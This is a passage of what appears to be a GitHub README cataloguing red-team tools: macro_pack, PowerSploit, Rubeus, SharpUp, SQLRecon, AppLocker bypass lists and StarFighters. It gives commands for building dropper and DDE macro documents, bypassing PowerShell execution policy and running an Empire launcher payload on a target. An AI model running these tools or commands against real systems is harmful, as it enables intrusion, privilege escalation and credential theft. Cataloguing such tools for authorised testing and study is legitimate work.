class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003edropped.exe\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e macro_pack.exe -o -t DROPPER -G \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003edrop.xlsm\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e \n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Execute calc.exe via Dynamic Data Exchange (DDE) attack\u003c/span\u003e\n\u003cspan class=\"pl-c1\"\u003eecho\u003c/span\u003e calc.exe \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e macro_pack.exe --dde -G calc.xslx\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/209868800-7fbcfdec-8ae8-4693-8438-feebc2309667.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/209868800-7fbcfdec-8ae8-4693-8438-feebc2309667.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/PowerShellMafia/PowerSploit\"\u003ePowerSploit\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-powersploit\" class=\"anchor\" aria-label=\"Permalink: 🔙PowerSploit\" href=\"#powersploit\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA collection of PowerShell scripts and modules that can be used to achieve a variety of red teaming objectives.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSome of the features of PowerSploit:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eDump password hashes and extract clear-text passwords from memory\u003c/li\u003e\n\u003cli\u003eEscalate privileges and bypass security controls\u003c/li\u003e\n\u003cli\u003eExecute arbitrary PowerShell code and bypass execution restrictions\u003c/li\u003e\n\u003cli\u003ePerform network reconnaissance and discovery\u003c/li\u003e\n\u003cli\u003eGenerate payloads and execute exploits\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e \u003cem\u003e1. Save to PowerShell modules folder\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFirst you will need to download the \u003ca href=\"https://github.com/PowerShellMafia/PowerSploit\"\u003ePowerSploit Folder\u003c/a\u003e and save it to your PowerShell modules folder.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYour PowerShell modules folder path can be found with the following command:\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"$Env:PSModulePath\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003e$Env:PSModulePath\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e \u003cem\u003e2. Install PowerSploit as a PowerShell module\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou will then need to install the PowerSploit module (use the name of the downloaded folder).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e \u003cem\u003eYour PowerShell execution policy might block you, to fix this run the following command.\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"powershell.exe -ep bypass\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003epowershell.exe -ep bypass\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eNow you can install the PowerSploit module.\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"Import-Module PowerSploit\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003eImport-Module PowerSploit\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"Get-Command -Module PowerSploit\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003eGet-Command -Module PowerSploit\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210267625-3135de58-df26-4e0a-9de4-741ad37d2eb9.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210267625-3135de58-df26-4e0a-9de4-741ad37d2eb9.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/GhostPack/Rubeus\"\u003eRubeus\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-rubeus\" class=\"anchor\" aria-label=\"Permalink: 🔙Rubeus\" href=\"#rubeus\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA tool that can be used to perform various actions related to Microsoft Active Directory (AD) environments, such as dumping password hashes, creating/deleting users, and modifying user properties.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSome of the features of Rubeus:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eKerberoasting\u003c/li\u003e\n\u003cli\u003eGolden ticket attacks\u003c/li\u003e\n\u003cli\u003eSilver ticket attacks\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Download)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou can install the unofficial pre-compiled Rubeus binary \u003ca href=\"https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Compile)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eRubeus is compatible with \u003ca href=\"https://visualstudio.microsoft.com/vs/community/\" rel=\"nofollow\"\u003eVisual Studio 2019 Community Edition\u003c/a\u003e. Open the rubeus \u003ca href=\"https://github.com/GhostPack/Rubeus\"\u003eproject .sln\u003c/a\u003e, choose \"Release\", and build.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"Rubeus.exe -h\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003eRubeus.exe -h\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/208250015-674a6fee-95b7-4edf-bd59-fe459cd235ed.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/208250015-674a6fee-95b7-4edf-bd59-fe459cd235ed.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/GhostPack/SharpUp\"\u003eSharpUp\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-sharpup\" class=\"anchor\" aria-label=\"Permalink: 🔙SharpUp\" href=\"#sharpup\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA nice tool for checking a victims endpoint for vulnerabilites relating to high integrity processes, groups, hijackable paths, etc.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Download)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou can install the unofficial pre-compiled SharpUp binary \u003ca href=\"https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/SharpUp.exe\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Compile)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSharpUp is compatible with \u003ca href=\"https://go.microsoft.com/fwlink/?LinkId=532606\u0026amp;clcid=0x409\" rel=\"nofollow\"\u003eVisual Studio 2015 Community Edition\u003c/a\u003e. Open the SharpUp \u003ca href=\"https://github.com/GhostPack/SharpUp\"\u003eproject .sln\u003c/a\u003e, choose \"Release\", and build.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"SharpUp.exe audit\n#-\u0026gt; Runs all vulnerability checks regardless of integrity level or group membership.\n\nSharpUp.exe HijackablePaths\n#-\u0026gt; Check only if there are modifiable paths in the user's %PATH% variable.\n\nSharpUp.exe audit HijackablePaths\n#-\u0026gt; Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.\"\u003e\u003cpre\u003eSharpUp.exe audit\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e-\u0026gt; Runs all vulnerability checks regardless of integrity level or group membership.\u003c/span\u003e\n\nSharpUp.exe HijackablePaths\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e-\u0026gt; Check only if there are modifiable paths in the user's %PATH% variable.\u003c/span\u003e\n\nSharpUp.exe audit HijackablePaths\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e-\u0026gt; Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210079939-e709cced-04a2-44a5-9da0-f387bc6599b1.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210079939-e709cced-04a2-44a5-9da0-f387bc6599b1.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/skahwah/SQLRecon\"\u003eSQLRecon\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-sqlrecon\" class=\"anchor\" aria-label=\"Permalink: 🔙SQLRecon\" href=\"#sqlrecon\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eMS-SQL (Microsoft SQL Server) is a relational database management system developed and marketed by Microsoft.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThis C# MS-SQL toolkit is designed for offensive reconnaissance and post-exploitation. For detailed usage information on each technique, refer to the \u003ca href=\"https://github.com/skahwah/SQLRecon/wiki\"\u003ewiki\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Binary)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou can download the latest binary release from \u003ca href=\"https://github.com/skahwah/SQLRecon/releases\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Authenticating using Windows credentials\nSQLRecon.exe -a Windows -s SQL01 -d master -m whoami\n\n# Authenticating using Local credentials\nSQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami\n\n# Authenticating using Azure AD credentials\nSQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami\n\n# Run whoami\nSQLRecon.exe -a Windows -s SQL01 -d master -m whoami\n\n# View databases\nSQLRecon.exe -a Windows -s SQL01 -d master -m databases\n\n# View tables\nSQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Authenticating using Windows credentials\u003c/span\u003e\nSQLRecon.exe -a Windows -s SQL01 -d master -m whoami\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Authenticating using Local credentials\u003c/span\u003e\nSQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Authenticating using Azure AD credentials\u003c/span\u003e\nSQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run whoami\u003c/span\u003e\nSQLRecon.exe -a Windows -s SQL01 -d master -m whoami\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e View databases\u003c/span\u003e\nSQLRecon.exe -a Windows -s SQL01 -d master -m databases\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e View tables\u003c/span\u003e\nSQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage information can be found on the \u003ca href=\"https://github.com/skahwah/SQLRecon/wiki\"\u003ewiki\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eTool module usage information can be found \u003ca href=\"https://github.com/skahwah/SQLRecon#usage\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/211530318-6e115272-a00c-4e9e-af9a-852d476ff3fb.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/211530318-6e115272-a00c-4e9e-af9a-852d476ff3fb.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from SQLRecon help page\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/api0cradle/UltimateAppLockerByPassList\"\u003eUltimateAppLockerByPassList\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-ultimateapplockerbypasslist\" class=\"anchor\" aria-label=\"Permalink: 🔙UltimateAppLockerByPassList\" href=\"#ultimateapplockerbypasslist\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThis resrouce is a collection of the most common and known techniques to bypass AppLocker.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSince AppLocker can be configured in different ways \u003ca href=\"https://github.com/api0cradle\"\u003e@api0cradle\u003c/a\u003e maintains a verified list of bypasses (that works against the default AppLocker rules) and a list with possible bypass technique (depending on configuration) or claimed to be a bypass by someone.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThey also have a list of generic bypass techniques as well as a legacy list of methods to execute through DLLs.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIndexed Lists\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md\"\u003eGeneric-AppLockerbypasses.md\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md\"\u003eVerifiedAppLockerBypasses.md\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/UnverifiedAppLockerBypasses.md\"\u003eUnverifiedAppLockerBypasses.md\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md\"\u003eDLL-Execution.md\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/217654010-5fa1102b-7463-4389-bd73-48a6b8a752bc.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/217654010-5fa1102b-7463-4389-bd73-48a6b8a752bc.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/api0cradle/UltimateAppLockerByPassList\"\u003ehttps://github.com/api0cradle/UltimateAppLockerByPassList\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/Cn33liz/StarFighters\"\u003eStarFighters\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-starfighters\" class=\"anchor\" aria-label=\"Permalink: 🔙StarFighters\" href=\"#starfighters\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA JavaScript and VBScript Based Empire Launcher, which runs within their own embedded PowerShell Host.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eBoth Launchers run within their own embedded PowerShell Host, so we don't need PowerShell.exe.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThis might be usefull when a company is blocking PowerShell.exe and/or is using a Application Whitelisting solution, but does not block running JS/VBS files.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eSetup a new Listener within PowerShell Empire\u003c/li\u003e\n\u003cli\u003eUse the Launcher command to Generate a PowerShell launcher for this listener\u003c/li\u003e\n\u003cli\u003eCopy and Replace the Base64 encoded Launcher Payload within the StarFighter JavaScript or VBScript file\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003eFor the JavaScript version use the following Variable:\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-js notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\" var EncodedPayload = \u0026quot;\u0026lt;Paste Encoded Launcher Payload Here\u0026gt;\u0026quot;\"\u003e\u003cpre\u003e \u003cspan class=\"pl-k\"\u003evar\u003c/span\u003e \u003cspan class=\"pl-v\"\u003eEncodedPayload\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\"\u0026lt;Paste Encoded Launcher Payload Here\u0026gt;\"\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFor the VBScript version use the following Variable:\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-vbnet notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\" Dim EncodedPayload: EncodedPayload = \u0026quot;\u0026lt;Paste Encoded Launcher Payload Here\u0026gt;\u0026quot;\"\u003e\u003cpre\u003e \u003cspan class=\"pl-k\"\u003eDim\u003c/span\u003e \u003cspan class=\"pl-smi\"\u003eEncodedPayload:\u003c/span\u003e \u003cspan class=\"pl-smi\"\u003eEncodedPayload\u003c/span\u003e \u003cspan class=\"pl-smi\"\u003e=\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\"\u0026lt;Paste Encoded Launcher Payload Here\u0026gt;\"\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eThen run: wscript.exe StarFighter.js or StarFighter.vbs on Target, or DoubleClick the launchers within Explorer.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/217654090-d8f57773-4fa0-44dd-b5b1-ad4b66f7c98e.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/217654090-d8f57773-4fa0-44dd-b5b1-ad4b66f7c98e.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html\" rel=\"nofollow\"\u003ehttps://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/nccgroup/demiguise\"\u003edemiguise\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-demiguise\" class=\"anchor\" aria-label=\"Permalink: 🔙demiguise\" href=\"#demiguise\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 